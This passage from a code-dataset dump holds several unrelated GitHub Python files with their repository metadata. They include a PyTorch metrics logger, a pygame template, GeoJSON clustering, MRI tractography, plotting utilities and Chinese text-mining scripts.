print(logger)\n >> logger.get_overall_average()\n\n >> predictions = _torch.tensor([0, 0, 2, 1, 0, 2, 1, 0, 2, 0, 2, 2]).long()\n >> labels = _torch.tensor([2, 0, 2, 2, 0, 1, 1, 2, 2, 0, 1, 2]).long()\n\n >> print(\" \", predictions, \"\\n \", labels)\n >> C = CategoricalMetrics()\n >> print(C.confusion_matrix(predictions, labels, 3))\n >> print(C.precision(predictions, labels, 3))\n >> print(C.recall(predictions, labels, 3))\n >> print(C.f1_score(predictions, labels, 3))\n \"\"\"\n\n\n\n\n 
def __init__(self, batch_size: int, num_classes: int, epochs_trained_prior: int = 0, acc: bool = False,\n precision: bool = True, recall: bool = True, f1: bool = True, confusion_matrix: bool = True):\n if acc and not (num_classes != 2):\n raise ValueError(\"Accuracy is only defined for binary classification tasks\")\n self.num_classes = num_classes\n self.batch_size = batch_size\n self.epochs_trained_prior = epochs_trained_prior\n\n # Prepare metrics\n extra_cols = []\n self.metrics = []\n if acc:\n extra_cols += [\"acc\"]\n self.metrics.append(\"acc\")\n if precision:\n extra_cols += ['precision_class', 'precision_avg_micro', 'precision_avg_macro']\n self.metrics.append(\"precision\")\n if recall:\n extra_cols += ['recall_class', 'recall_avg_micro', 'recall_avg_macro']\n self.metrics.append(\"recall\")\n if f1:\n extra_cols += ['f1_class', 'f1_avg_micro', 'f1_avg_macro']\n self.metrics.append(\"f1\")\n if confusion_matrix:\n extra_cols += [\"confusion_matrix\"]\n self.metrics.append(\"confusion_matrix\")\n\n df_columns = [\"timestamp\", \"epoch_trained_relative\", \"epochs_trained_total\", \"loss_train\", \"loss_valid\"]\n self.df = _pd.DataFrame(columns=df_columns)\n\n\n def __repr__(self):\n if _jupyter_ipython.in_jupyter():\n display(self.df) # This will just display the pandas dataframe as normally in jupyter notebook\n return \"\"\n else:\n return str(self.df)\n\n def _calculate_metric(self, metric, preds, gt):\n cfm = pytorch_metrics.confusion_matrix(preds, gt, self.num_classes)\n if metric == \"acc\":\n return pytorch_metrics.acc(preds, gt, self.num_classes)\n if metric == \"precision\":\n return pytorch_metrics.precision(preds, gt, self.num_classes, cfm=cfm)\n if metric == \"recall\":\n return pytorch_metrics.recall(preds, gt, self.num_classes, cfm=cfm)\n if metric == \"f1\":\n return pytorch_metrics.f1_score(preds, gt, self.num_classes, cfm=cfm)\n if metric == \"confusion_matrix\":\n return cfm\n\n def update(self, current_epoch, preds: _torch.Tensor, gt: _torch.Tensor, loss_train:_torch.Tensor=None, loss_valid:_torch.Tensor=None):\n # Checks\n _type_check.assert_types([current_epoch, preds, gt, loss_train, loss_valid], [int] + [_torch.Tensor]*4, [False, False, False, True, True])\n\n # Add new row which will be populated one variable at a time\n i = len(self.df)\n self.df.loc[i] = None\n\n # Simple logging stuff\n self.df.loc[i, \"epoch_trained_relative\"] = current_epoch\n self.df.loc[i, \"epochs_trained_total\"] = self.epochs_trained_prior + current_epoch\n self.df.loc[i, \"timestamp\"] = _datetime.today().strftime(\"%Y-%m-%d %H:%M:%S\")\n\n # Losses\n if loss_train:\n self.df.loc[i, \"loss_train\"] = loss_train.clone().cpu().detach().item()\n assert loss_valid.shape == _torch.Size([]), f\"Expected `loss_valid` be a single number, but received `loss_train.shape={loss_valid.shape}`\"\n if loss_valid:\n self.df.loc[i, \"loss_valid\"] = loss_valid.clone().cpu().detach().item()\n assert loss_train.shape == _torch.Size([]), f\"Expected `train_loss` be a single number, but received `loss_train.shape={loss_train.shape}`\"\n\n # Calculate all the metrics and add them one at a time.\n # Some metrics return more then one value (per class, avg_micro, ...). 
This is handled with dicts\n for metric in self.metrics:\n return_value = self._calculate_metric(metric, preds, gt)\n if isinstance(return_value, dict):\n for name, value in return_value.items():\n self.df.loc[i, name] = str(value)\n elif metric == \"confusion_matrix\":\n self.df.loc[i, metric] = str(return_value.tolist())\n else:\n self.df.loc[i, metric] = str(return_value)\n\n # Check if there's any illegal NAs (only train_loss and valid_loss is allowed to be NA, hence the drop)\n assert not any(self.df.drop(columns=[\"loss_train\", \"loss_valid\"]).iloc[i].isna().tolist()), \\\n f\"At least one value was determined to be NA. The problem occurred in row: {self.df.loc[i]}\"\n\n def get_overall_average(self):\n df_combined = self.df.iloc[0:0].copy()\n df_combined = df_combined.drop(columns=[\"timestamp\"])\n df_combined.loc[0] = None\n\n for col_name in df_combined:\n values_combined = _np.array([_ast.literal_eval(str(l)) for l in self.df[col_name].tolist() if str(l) != \"nan\"])\n if len(values_combined) == 0:\n if col_name not in [\"loss_train\", \"loss_valid\"]: raise RuntimeError(\"Unexpected error. Probably caused by illegal NAs\")\n df_combined[col_name] = None\n elif col_name in [\"epoch_trained_relative\", \"epochs_trained_total\"]:\n df_combined[col_name] = self.df[col_name].max()\n elif \"class\" in col_name:\n df_combined[col_name] = str(values_combined.mean(0))\n elif col_name == \"confusion_matrix\":\n df_combined[col_name] = str(values_combined.sum(0).tolist())\n else:\n df_combined[col_name] = values_combined.mean()\n return df_combined\n\n\nif __name__ == \"__main__\" and False:\n logger = CategoricalLogger(10, 3)\n for epoch in range(5):\n logger.update(epoch, _torch.randint(0, 3, (100,)).long(), _torch.randint(0, 3, (100,)).long(),\n _torch.rand(1)[0], _torch.rand(1)[0])\n print(logger)\n logger.get_overall_average()\n\n\n predictions = _torch.tensor([0, 0, 2, 1, 0, 2, 1, 0, 2, 0, 2, 2]).long()\n labels = _torch.tensor([2, 0, 2, 2, 0, 1, 1, 2, 2, 0, 1, 2]).long()\n\n print(\" \", predictions, \"\\n \", labels)\n C = CategoricalMetrics()\n print(C.confusion_matrix(predictions, labels, 3))\n print(C.precision(predictions, labels, 3))\n print(C.recall(predictions, labels, 3))\n print(C.f1_score(predictions, labels, 3))","repo_name":"Jako-K/utils","sub_path":"dutils/_testing/pytorch_metrics.py","file_name":"pytorch_metrics.py","file_ext":"py","file_size_in_byte":14188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"23360030958","text":"# pygame_boilerplate.py\r\n\r\nimport pygame\r\n\r\n# ----- CONSTANTS\r\nBLACK = (0, 0, 0)\r\nWHITE = (255, 255, 255)\r\nYELLOW = (255, 255, 0)\r\nSKY_BLUE = (95, 165, 228)\r\nWIDTH = 800\r\nHEIGHT = 600\r\nTITLE = \"\"\r\n\r\n\r\ndef main():\r\n pygame.init()\r\n\r\n # ----- SCREEN PROPERTIES\r\n size = (WIDTH, HEIGHT)\r\n screen = pygame.display.set_mode(size)\r\n pygame.display.set_caption(TITLE)\r\n\r\n # ----- LOCAL VARIABLES\r\n done = False\r\n clock = pygame.time.Clock()\r\n\r\n # ----- MAIN LOOP\r\n while not done:\r\n # -- Event Handler\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n done = True\r\n\r\n # ----- LOGIC\r\n\r\n # ----- DRAW\r\n screen.fill(BLACK)\r\n\r\n # ----- UPDATE\r\n pygame.display.flip()\r\n clock.tick(60)\r\n\r\n pygame.quit()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n 
main()\r\n","repo_name":"WongMatthew/PythonBoilerPlate","sub_path":"pygame_boilerplate.py","file_name":"pygame_boilerplate.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"42"} +{"seq_id":"26495306655","text":"import sys\nimport json\nimport pdb\n\n#Nacteni vstupnich argumentu (vstupni a vystupni soubor)\nif len(sys.argv)>2:\n data_import=sys.argv[1]\n data_export=sys.argv[2]\nelse:\n print(\"Nedostatecny pocet vstupnich argumentu!\")\n data_import='stromy.geojson'\n data_export='export.geojson'\n print('Argumenty nastaveny na \"stromy.geojson\" a \"export.geojson\".')\n\n\n# nacteni geojsonu\nwith open(data_import, encoding='utf-8') as f:\n f = json.load(f)\n\n# vytvoreni seznamu a nacteni souradnic do neho\ndata = []\ni = -1\nfor feature in f['features']:\n i = i + 1\n data.append(feature['geometry']['coordinates'])\n data[i].append(0)\n\n#zjisteni stredovych souradnic\ndef get_x_half(data):\n xmin = min(x[0] for x in data)\n xmax = max(x[0] for x in data)\n return (xmax - xmin) / 2 + xmin\n\n\ndef get_y_half(data):\n ymin = min(y[1] for y in data)\n ymax = max(y[1] for y in data)\n return (ymax - ymin) / 2 + ymin\n\n\n#vypocte osy, podle kterych se bude delit\nhalf_x = get_x_half(data)\nhalf_y = get_y_half(data)\n\n\n# rozdeleni bodu podle stredovych souradnic a prirazeni identifikatoru\ndef rozrazeni(data, half_x, half_y):\n #kontrola, zdali vstup uz neobsahuje mene nez 50 bodu\n if len(data)<=50:\n return data\n\n # vytvoreni 4 seznamu\n sektor1 = []\n sektor2 = []\n sektor3 = []\n sektor4 = []\n\n # zjisteni jejich polohy a prirazeni ID clusteru\n i = -1\n for feature in data:\n i = i + 1\n x = data[i][0]\n y = data[i][1]\n if x < half_x and y > half_y:\n data[i][2] = str(data[i][2]) + '1'\n sektor1.append(feature)\n elif x > half_x and y > half_y:\n data[i][2] = str(data[i][2]) + '2'\n sektor2.append(feature)\n\n elif x < half_x and y < half_y:\n data[i][2] = str(data[i][2]) + '3'\n sektor3.append(feature)\n\n elif x > half_x and y < half_y:\n data[i][2] = str(data[i][2]) + '4'\n # pdb.set_trace()\n sektor4.append(feature)\n\n #pokud sektor1,2,3,4 obsahuje vice nez 50 bodu, dochazi k novemu deleni a prirazovani ID\n if len(sektor1) > 50:\n half_x = get_x_half(sektor1)\n half_y = get_y_half(sektor1)\n sektor1=rozrazeni(sektor1, half_x, half_y)\n if len(sektor2) > 50:\n half_x = get_x_half(sektor2)\n half_y = get_y_half(sektor2)\n sektor2=rozrazeni(sektor2, half_x, half_y)\n if len(sektor3) > 50:\n half_x = get_x_half(sektor3)\n half_y = get_y_half(sektor3)\n sektor3=rozrazeni(sektor3, half_x, half_y)\n if len(sektor4) > 50:\n half_x = get_x_half(sektor4)\n half_y = get_y_half(sektor4)\n sektor4=rozrazeni(sektor4, half_x, half_y)\n\n data=sektor1+sektor2+sektor3+sektor4\n return data\n\n# a proto jdou do metody dump na poslednim radku prave data (ne data_after)\ndata_after=rozrazeni(data,half_x, half_y)\n\nwith open(data_export, 'w') as g:\n json.dump(data,g)\n","repo_name":"Martinazije/Zaklady_programovani","sub_path":"ukol2.py","file_name":"ukol2.py","file_ext":"py","file_size_in_byte":2938,"program_lang":"python","lang":"cs","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"42292915422","text":"import os\nfrom nifti_handler import getfa, getdwidata, getlabelmask, move_bvals, getmask\nimport numpy as np\nfrom tract_manager import create_tracts\nfrom dipy.segment.mask import median_otsu\nfrom dipy.io.image import load_nifti, save_nifti\nfrom diff_preprocessing import 
dwi_to_mask, denoise_pick\nfrom dif_to_trk import make_tensorfit, QCSA_tractmake\nfrom Daemonprocess import MyPool\nimport multiprocessing as mp\n\ndef orient_to_str(bvec_orient):\n mystr=\"_\"\n for i in np.arange(3):\n if np.abs(bvec_orient[i]) == 1:\n if bvec_orient[i]<0:\n mystr = mystr+\"mx\"\n else:\n mystr = mystr+\"px\"\n if np.abs(bvec_orient[i]) == 2:\n if bvec_orient[i] < 0:\n mystr = mystr + \"my\"\n else:\n mystr = mystr + \"py\"\n if np.abs(bvec_orient[i])==3:\n if bvec_orient[i]<0:\n mystr = mystr+\"mz\"\n else:\n mystr = mystr+\"pz\"\n return mystr\n\n\nmasktype = \"FA\"\nmasktype = \"T1\"\nmasktype = \"dwi\"\nsubject_processes = 1\nfunction_processes = 10\nratio = 10\nget_params = None\ndoprune = True\nlabelslist = []\nfigspath = \"/Volumes/Data/Badea/ADdecode.01/Analysis/\"\noutpath = \"/Volumes/Data/Badea/ADdecode.01/Analysis/\"\ndwipath = \"/Volumes/Data/Badea/ADdecode.01/Data/Anat/20210216_02491/bia6_02491_003.nii.gz\"\nstepsize = 0.5\nvol_b0 = [0,1,2]\nsubject = \"02491\"\nstrproperty = \"_FA\"\nverbose = True\noverwrite = False\noutpathtrk = os.path.join(outpath,subject + strproperty + '_pruned.trk')\nsubject_processes = 1\n\noutpathmask = os.path.join(outpath, subject)\n#data, affine, gtab, vox_size, fdwipath, hdr, header = getdwidata(dwipath, subject, None)\n#mask, _ = dwi_to_mask(data, affine, outpathmask, makefig=False, vol_idx=vol_b0, median_radius=5, numpass=6,\n# dilate=2)\n\n#if masktype == \"FA\":\n# data, affine, gtab, vox_size, fdwipath, hdr, header = getdwidata(dwipath, subject, None)\n# outpathbmfa, mask = make_tensorfit(data, mask, gtab, affine, subject, outpath=dwipath, verbose=verbose)\nif masktype == \"dwi\":\n outpathmask = os.path.join(outpath, subject)\n data, affine, gtab, vox_size, fdwipath, hdr, header = getdwidata(dwipath, subject, None)\n mask, _ = dwi_to_mask(data, affine, outpathmask, makefig=False, vol_idx=vol_b0, median_radius=5, numpass=6,\n dilate=2)\nelif masktype == \"T1\":\n #bet bia6_02491_40006.nii.gz 02491.nii.gz -m -o -f 0.4\n #mv 02491_mask.nii.gz 02491_T1_binary_mask.nii.gz\n mask, affinemask = getmask(outpath,subject,\"T1\",verbose)\n\nimport itertools\nbvec_orient1 = (np.array(list(itertools.permutations([1, 2, 3]))))\nbvec_orient2 = [elm*[-1, 1, 1] for elm in bvec_orient1]\nbvec_orient3 = [elm*[1, -1, 1] for elm in bvec_orient1]\nbvec_orient4 = [elm*[1, 1, -1] for elm in bvec_orient1]\n\nbvec_orient_list = np.concatenate((bvec_orient1, bvec_orient2, bvec_orient3, bvec_orient4))\n\nif subject_processes>1:\n if function_processes>1:\n pool = MyPool(subject_processes)\n else:\n pool = mp.Pool(subject_processes)\n\n tract_results = pool.starmap_async(create_tracts, [(dwipath, outpath, subject, figspath, stepsize, function_processes,\n orient_to_str(bvec_orient), ratio, masktype, labelslist, bvec_orient, doprune,\n overwrite, get_params, verbose) for bvec_orient in bvec_orient_list]).get()\n pool.close()\nelse:\n txtfile = os.path.join(outpath, subject + \"_params.txt\")\n for bvec_orient in bvec_orient_list:\n tract_results = []\n print(bvec_orient)\n str_identifier = orient_to_str(bvec_orient)\n str_identifier = strproperty + str_identifier\n tract_results.append(create_tracts(dwipath, outpath, subject, figspath, stepsize, function_processes,\n str_identifier, ratio, masktype, 'FA', labelslist, bvec_orient, doprune, overwrite, get_params,\n verbose))\n print(tract_results)\n\n \"\"\"\n with open(txtfile, 'a') as f:\n for item in tract_results:\n f.write(\"Subject %s with %s %s %s \\n\" % 
(item[0],str(bvec_orient[0]),str(bvec_orient[1]),str(bvec_orient[2])))\n f.write(\"Num tracts: %s \\n\" % item[2][0])\n f.write(\"Min tract length: %s \\n\" % item[2][1])\n f.write(\"Max tract length: %s \\n\" % item[2][2])\n f.write(\"Average tract length: %s \\n\" % item[2][3])\n f.write(\"Standard deviancy tract length: %s \\n\" % item[2][4])\n \"\"\"\n","repo_name":"portokalh/wuconnectomes","sub_path":"debugger_files/02491_tractmaker.py","file_name":"02491_tractmaker.py","file_ext":"py","file_size_in_byte":4545,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"42"} +{"seq_id":"2018993967","text":"import setuptools\r\n\r\nwith open(\"README.md\", \"r\") as fh:\r\n long_description = fh.read()\r\n\r\nsetuptools.setup(\r\n name='kpick', \r\n version='1.0.0',\r\n author=\"Trung M. Bui\",\r\n author_email=\"bmtrungvp@gmail.com\",\r\n description=\"An AI picking package\",\r\n long_description=long_description,\r\n long_description_content_type=\"text/markdown\",\r\n url=\"https://github.com/mtbui2010\",\r\n packages= setuptools.find_packages(),\r\n classifiers=[\r\n \"Programming Language :: Python :: 3\",\r\n \"License :: OSI Approved :: MIT License\",\r\n \"Operating System :: OS Independent\",\r\n ],\r\n python_requires='>=3.6',\r\n #entry_points = {\r\n # 'console_scripts': ['ttcv_sample=ttcv.samples.select_sample:run'],\r\n # }\r\n license='MIT', \r\n keywords = ['AI','VISION', 'GRASP DETECTION'],\r\n install_requires=[ \r\n 'numpy',\r\n 'opencv-python',\r\n 'scipy',\r\n 'matplotlib',\r\n \t'ttcv',\r\n 'torch==1.4.0',\r\n 'torchvision==0.5.0',\r\n\t'progress',\r\n\t'ray',\r\n ],\r\n)\t\r\n","repo_name":"mtbui2010/kpick_binary","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"73592993727","text":"from abc import ABC, abstractmethod\r\nimport numpy as np\r\nfrom scipy.stats import chi2\r\nfrom matplotlib.patches import Ellipse\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\n\r\n\r\ndef _check_mean_cov(mean, cov, d=2):\r\n mean = np.array(mean)\r\n cov = np.array(cov)\r\n assert len(mean) == cov.shape[0] == cov.shape[1] == d, \"len(mean) must = cov.shape[0] = cov.shape[1]\"\r\n return mean, cov\r\n\r\n\r\nclass CovarianceIntervals(ABC):\r\n \"\"\"\r\n Abstract base class for plotting animated confidence intervals (one derived subclass for number of dimensions,\r\n e.g. 
2D ellipses, 3D ellipsoids\r\n \"\"\"\r\n\r\n def get_artists(self):\r\n return self._artists\r\n\r\n @abstractmethod\r\n def update(self, mean, cov):\r\n \"\"\"Update artists for animation\"\"\"\r\n pass\r\n\r\n @abstractmethod\r\n def get_legend_handle(self):\r\n \"\"\"Return an object that can be used by a legend call\"\"\"\r\n pass\r\n\r\n\r\nclass CovarianceEllipses2D(CovarianceIntervals):\r\n \"\"\"Handler for plotting and animating 2D covariance ellipses\"\"\" \r\n def __init__(self, ax, mean=[0,0], cov=[[1,0],[0,1]], ellipse_masses=[0.68, 0.95], alpha=0.3, animated=False, facecolor=None, **kwargs) -> None:\r\n self.mean, self.cov = _check_mean_cov(mean, cov)\r\n self.ax = ax\r\n self._ellipse_scales = np.sqrt(chi2.ppf(ellipse_masses, df=2))\r\n self._artists = []\r\n d1, d2, angle = self._get_ellipse_params()\r\n\r\n for s in self._ellipse_scales:\r\n ellipse = Ellipse(mean, width=d1*s, height=d2*s, angle=angle, alpha=alpha, animated=animated, **kwargs)\r\n if facecolor == 'none':\r\n ellipse.set_facecolor('none')\r\n ax.add_patch(ellipse)\r\n self._artists.append(ellipse)\r\n\r\n def update(self, mean, cov):\r\n self.mean, self.cov = _check_mean_cov(mean, cov)\r\n d1, d2, angle = self._get_ellipse_params()\r\n for ell, s in zip(self._artists, self._ellipse_scales):\r\n ell.set_width(d1*s)\r\n ell.set_height(d2*s)\r\n ell.set_angle(angle)\r\n ell.set_center(mean)\r\n\r\n return self._artists\r\n\r\n def _get_ellipse_params(self):\r\n # Get ellipse parameters (note angle returned in degrees because that's what Ellipse.set_angle() expects)\r\n # Get eigenvalues and sort them (big first)\r\n w, V = np.linalg.eig(self.cov)\r\n idx = -w.argsort()[::-1] \r\n w = w[idx]\r\n V = V[:,idx]\r\n d1, d2 = 2*np.sqrt(w)\r\n angle = np.arctan2(V[1,0], V[0,0])*180.0/np.pi\r\n return d1, d2, angle\r\n\r\n def get_legend_handle(self):\r\n return self._artists[0]\r\n\r\n\r\nclass CovarianceEllipsoids3D(CovarianceIntervals):\r\n \"\"\"Plot covariance ellipsoids in 3D\r\n Based on https://github.com/CircusMonkey/covariance-ellipsoid/blob/master/ellipsoid.py\r\n \"\"\"\r\n\r\n def __init__(self, ax, mean=[0,0,0], cov=np.eye(3), ellipse_masses=[0.68, 0.95], animated=True, num_u: int=40, num_v: int=20, **kwargs) -> None:\r\n self.mean, self.cov = _check_mean_cov(mean, cov, d=3)\r\n assert isinstance(ax, Axes3D), \"Axes must be mpl_toolkits.mplot3d.Axes3D instance\"\r\n self.ax = ax\r\n self.kwargs = {'color': 'b', 'edgecolor': 'none', 'alpha': 0.2}\r\n self.kwargs.update(kwargs)\r\n\r\n # Calculate the target volume of the ellipsoid with the specified confidence bounds\r\n self._ellipsoid_radii = np.sqrt(chi2.ppf(ellipse_masses, 3))\r\n\r\n u = np.linspace(0, 2*np.pi, num_u)\r\n v = np.linspace(0, np.pi, num_v)\r\n x = np.outer(np.cos(u), np.sin(v))\r\n y = np.outer(np.sin(u), np.sin(v))\r\n z = np.outer(np.ones_like(u), np.cos(v))\r\n self._unit_points = np.stack((x.ravel(), y.ravel(), z.ravel()), 0)\r\n self._points_shape = x.shape\r\n\r\n self._artists = []\r\n\r\n for r in self._ellipsoid_radii:\r\n ell = self.ax.plot_surface(*self._make_ellipsoid(r), **self.kwargs)\r\n self._artists.append(ell)\r\n\r\n def _make_ellipsoid(self, radius):\r\n \"\"\"Construct ellipsoid for specified mean, cov and equivalent target radius\"\"\"\r\n\r\n # Extract the Eigenvalues of the covariance to calculate scale \r\n scale = radius/(np.linalg.det(self.cov)**(1.0/6))\r\n\r\n X, Y, Z = scale * (self.cov @ self._unit_points).reshape(3, *self._points_shape)\r\n return X+self.mean[0], Y+self.mean[1], 
Z+self.mean[2]\r\n\r\n\r\n def update(self, mean, cov):\r\n self.mean, self.cov = _check_mean_cov(mean, cov, d=3)\r\n\r\n for i, r in enumerate(self._ellipsoid_radii):\r\n # I don't like that you have to completely replot, but seems like the only/best way\r\n self._artists[i].remove()\r\n self._artists[i] = self.ax.plot_surface(*self._make_ellipsoid(r), **self.kwargs)\r\n\r\n return self._artists\r\n\r\n def get_legend_handle(self):\r\n \"\"\"Nasty hack to set properties that legend expects to exist\"\"\"\r\n self._artists[0]._facecolors2d = self._artists[0]._facecolor3d\r\n self._artists[0]._edgecolors2d = self._artists[0]._edgecolor3d\r\n return self._artists[0]\r\n ","repo_name":"nrjl/plot_helpers","sub_path":"plot_helpers/covariance_ellipse.py","file_name":"covariance_ellipse.py","file_ext":"py","file_size_in_byte":5108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"20988750230","text":"import pandas as pd\n# 数据处理库\nimport numpy as np\nimport re\nimport jieba\nimport jieba.analyse\nfrom collections import Counter\nfrom IPython.display import Image\nimport stylecloud\nfrom gensim import corpora, models\nimport itertools\nimport pyLDAvis\nimport pyLDAvis.gensim\nimport os\nimport matplotlib.pyplot as plt\nimport paddlehub as hub\nimport statsmodels.api as sm\nimport seaborn as sns\n\n#LDA建模\ndef lda():\n df = pd.read_excel('棱镜.xlsx')\n df = df.dropna(subset=['正文'], axis=0)\n content = df['正文'].drop_duplicates(keep='first')\n content = content.dropna(how='any')\n\n # def is_all_chinese(strs):\n # for _char in strs:\n # if not '\\u4e00' <= _char <= '\\u9fa5':\n # return False\n # return True\n #\n # stop_words = []\n #\n # with open(\"stopwords_cn.txt\", 'r', encoding='utf-8-sig') as f:\n # lines = f.readlines()\n # for line in lines:\n # stop_words.append(line.strip())\n #\n # f = open('class-fenci.txt', 'w', encoding='utf-8-sig')\n # for line in content:\n # line = line.strip('\\n')\n # # 停用词过滤\n # line = re.sub('[0-9’!\"#$%&\\'()*+,-./:;<=>?@,。?★、…【】《》?“”‘’![\\\\]^_`{|}~\\s]+', \"\", line)\n # seg_list = jieba.cut(line, cut_all=False)\n # cut_words = (\" \".join(seg_list))\n #\n # # 计算关键词\n # all_words = cut_words.split()\n # c = Counter()\n # for x in all_words:\n # if len(x) >= 2 and x != '\\r\\n' and x != '\\n':\n # if is_all_chinese(x) == True and x not in stop_words:\n # c[x] += 1\n # # Top30\n # output = \"\"\n # for (k, v) in c.most_common(30):\n # output += k + \" \"\n #\n # f.write(output + \"\\n\")\n # else:\n # f.close()\n\n fr = open('class-fenci.txt', 'r', encoding='utf-8-sig')\n train = []\n for line in fr.readlines():\n line = [word.strip() for word in line.split(' ') if len(word) >= 2]\n train.append(line)\n\n dictionary = corpora.Dictionary(train)\n corpus = [dictionary.doc2bow(text) for text in train]\n #困惑度模块\n x_data = []\n y_data = []\n for i in range(2,15):\n x_data.append(i)\n lda = models.LdaModel(corpus=corpus, id2word=dictionary, num_topics=i, random_state=111, iterations=400)\n perplexity = lda.log_perplexity(corpus)\n y_data.append(perplexity)\n\n data = pd.DataFrame()\n data['主题数'] = x_data\n data['困惑度'] = y_data\n data.to_csv('困惑度.csv',encoding='utf-8-sig',index=False)\n\n\n # 绘制困惑度折线图\n plt.figure(figsize=(15, 5))\n plt.rcParams['font.sans-serif'] = ['SimHei']\n plt.rcParams['axes.unicode_minus'] = False\n\n plt.plot(x_data, y_data, marker=\"o\")\n plt.title(\"主题建模-困惑度\")\n plt.xlabel('主题数目')\n plt.ylabel('困惑度大小')\n plt.savefig(\"主题建模-困惑度.png\")\n plt.show()\n\n #LDA可视化模块\n lda = 
models.LdaModel(corpus=corpus, id2word=dictionary, num_topics=11, random_state=111, iterations=400)\n data1 = pyLDAvis.gensim.prepare(lda, corpus, dictionary)\n pyLDAvis.save_html(data1, 'lda.html')\n\n #主题判断模块\n list3 = []\n list2 = []\n for i in lda.get_document_topics(corpus)[:]:\n listj = []\n list1 = []\n for j in i:\n list1.append(j)\n listj.append(j[1])\n list3.append(list1)\n bz = listj.index(max(listj))\n list2.append(i[bz][0])\n\n df['主题概率'] = list3\n df['主题类型'] = list2\n\n df.to_csv('new_困惑度.csv',encoding='utf-8-sig',index=False)\n new_data = df['主题类型'].value_counts()\n new_data = new_data.sort_index(ascending=True)\n y_data1 = [y for y in new_data.values]\n\n #主题词模块\n word = lda.print_topics(num_words=20)\n\n topic = []\n quanzhong = []\n for w in word:\n ci = str(w[1])\n c1 = re.compile('\\*\"(.*?)\"')\n c2 = c1.findall(ci)\n c3 = '、'.join(c2)\n zt = \"Topic\" + str(w[0])\n topic.append(zt)\n quanzhong.append(c3)\n\n df1 = pd.DataFrame()\n df1['所属主题'] = topic\n df1['文章数量'] = y_data1\n df1['特征词'] = quanzhong\n df1.to_excel('data.xlsx',encoding='utf-8-sig',index=False)\n\n#情感分析模块\ndef sentiment():\n df = pd.read_excel('棱镜.xlsx')\n df = df.dropna(subset=['正文'], axis=0)\n\n # 这里使用了百度开源的成熟NLP模型来预测情感倾向\n senta = hub.Module(name=\"senta_bilstm\")\n texts = df['正文'].tolist()\n input_data = {'text': texts}\n res = senta.sentiment_classify(data=input_data)\n df['情感分值'] = [x['positive_probs'] for x in res]\n df.to_csv('情感数据.csv', encoding='utf-8-sig', index=False)\n plt.rcParams['font.sans-serif'] = ['SimHei']\n plt.figure(figsize=(12, 6))\n plt.hist(df['情感分值'], bins=np.arange(0, 1, 0.01), facecolor='#E74C3C')\n plt.xlabel('情感数值')\n plt.ylabel('数量')\n plt.title('情感分析')\n plt.savefig('Analysis of Sentiments.jpg')\n plt.show()\n\n#词云图高频词模块,这块是正文分词\ndef wordclound_zw():\n df = pd.read_excel('棱镜.xlsx')\n df = df.dropna(subset=['正文'], axis=0)\n content = df['正文'].drop_duplicates(keep='first')\n content = content.dropna(how='any')\n\n def is_all_chinese(strs):\n for _char in strs:\n if not '\\u4e00' <= _char <= '\\u9fa5':\n return False\n return True\n\n def get_cut_words(content_series):\n # 读入停用词表\n stop_words = []\n\n with open(\"stopwords_cn.txt\", 'r', encoding='utf-8') as f:\n lines = f.readlines()\n for line in lines:\n stop_words.append(line.strip())\n\n # 分词\n word_num = jieba.lcut(content_series.str.cat(sep='。'), cut_all=False)\n\n # 条件筛选\n word_num_selected = [i for i in word_num if i not in stop_words and len(i) >= 2 and is_all_chinese(i) == True]\n return word_num_selected\n\n text3 = get_cut_words(content_series=content)\n stylecloud.gen_stylecloud(text=' '.join(text3), max_words=100,\n collocations=False,\n font_path='simhei.ttf',\n icon_name='fas fa-circle',\n size=500,\n # palette='matplotlib.Inferno_9',\n output_name='正文-词云图.png')\n Image(filename='正文-词云图.png')\n\n counts = {}\n for t in text3:\n counts[t] = counts.get(t, 0) + 1\n\n ls = list(counts.items())\n ls.sort(key=lambda x: x[1], reverse=True)\n x_data = []\n y_data = []\n\n for key, values in ls[:200]:\n x_data.append(key)\n y_data.append(values)\n\n df1 = pd.DataFrame()\n df1['word'] = x_data\n df1['counts'] = y_data\n df1.to_csv('top200_正文高频词.csv', encoding=\"utf-8-sig\")\n\n#词云图高频词模块,这块是标题分词\ndef wordclound_bt():\n df = pd.read_excel('棱镜.xlsx')\n df = df.dropna(subset=['新闻标题'], axis=0)\n content = df['新闻标题'].drop_duplicates(keep='first')\n content = content.dropna(how='any')\n\n def is_all_chinese(strs):\n for _char in strs:\n if not '\\u4e00' <= _char <= '\\u9fa5':\n return False\n return True\n\n def 
get_cut_words(content_series):\n # 读入停用词表\n stop_words = []\n\n with open(\"stopwords_cn.txt\", 'r', encoding='utf-8') as f:\n lines = f.readlines()\n for line in lines:\n stop_words.append(line.strip())\n\n # 分词\n word_num = jieba.lcut(content_series.str.cat(sep='。'), cut_all=False)\n\n # 条件筛选\n word_num_selected = [i for i in word_num if i not in stop_words and len(i) >= 2 and is_all_chinese(i) == True]\n return word_num_selected\n\n text3 = get_cut_words(content_series=content)\n stylecloud.gen_stylecloud(text=' '.join(text3), max_words=100,\n collocations=False,\n font_path='simhei.ttf',\n icon_name='fas fa-circle',\n size=500,\n # palette='matplotlib.Inferno_9',\n output_name='标题-词云图.png')\n Image(filename='标题-词云图.png')\n\n counts = {}\n for t in text3:\n counts[t] = counts.get(t, 0) + 1\n\n ls = list(counts.items())\n ls.sort(key=lambda x: x[1], reverse=True)\n x_data = []\n y_data = []\n\n for key, values in ls[:200]:\n x_data.append(key)\n y_data.append(values)\n\n df1 = pd.DataFrame()\n df1['word'] = x_data\n df1['counts'] = y_data\n df1.to_csv('top200_标题高频词.csv', encoding=\"utf-8-sig\")\n\n#多重线性回归\ndef topic_pl():\n df = pd.read_csv('new_棱镜.csv')\n y = df['评论数']\n X = df['主题类型']\n model = sm.OLS(y, X).fit()\n predictions = model.predict(X)\n print(model.summary())\n\n\n#相关性\ndef topic_qg():\n df = 